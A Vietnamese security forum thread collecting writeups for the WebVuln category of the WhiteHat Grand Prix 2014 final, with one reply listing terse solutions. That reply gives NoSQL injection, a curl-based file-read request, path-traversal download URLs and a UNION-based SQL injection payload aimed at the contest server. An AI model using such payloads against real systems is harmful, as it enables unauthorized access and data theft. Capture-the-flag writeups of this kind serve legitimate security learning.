[Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014

Thảo luận trong 'Writeup WhiteHat Grand Prix' bắt đầu bởi BkavCR, 30/10/14, 11:10 AM.

  1. BkavCR

    BkavCR VIP Members

    Tham gia: 27/09/13, 11:09 AM
    Bài viết: 204
    Đã được thích: 95
    Điểm thành tích:
    48
    Topic này được tạo để các bạn viết, trao đổi thảo luận về Writeup Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014.

    Đề thi: Mời bạn đăng nhập vào trang http://grandprix.whitehat.vn/ bằng tài khoản và mật khẩu WhiteHat Forum để lấy đề thi.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    BkavCR, 30/10/14, 11:10 AM
    #1
  2. REBD

    REBD W-------

    Tham gia: 22/09/14, 02:09 PM
    Bài viết: 8
    Đã được thích: 0
    Điểm thành tích:
    6
    Re: [Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014

    Web100:
    Mã:
    http://103.237.98.38/web100/index.php?name[$ne]=abc
    Web300:
    Mã:
    curl -ik http://103.237.98.38/web300/execute.php -d "command=sha1sum&filename=login.php"
Down login.php -> decode -> flag
    Web400:
    Mã:
    http://103.237.98.38/web400/

SQLi trong phần reg/login, mình ko nhớ rõ nhưng đại loại leak ở sessionid khi login.
Vào được admin -> http://103.237.98.38/web400/broken/data/download.php . đoán đc field ?file=download.php

view-source:http://103.237.98.38/web400/broken/data/download.php?file=protecteD/.htaccess
view-source:http://103.237.98.38/web400/broken/data/download.php?file=protecteD/_secret__

    Web trong phần Att/Def:
    Mã:
    Lỗi nằm ở phần download file sau khi upload, đại loại là: -1' union select 1,'./flag/...' -- a
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    REBD, 28/11/14, 12:11 PM
    #2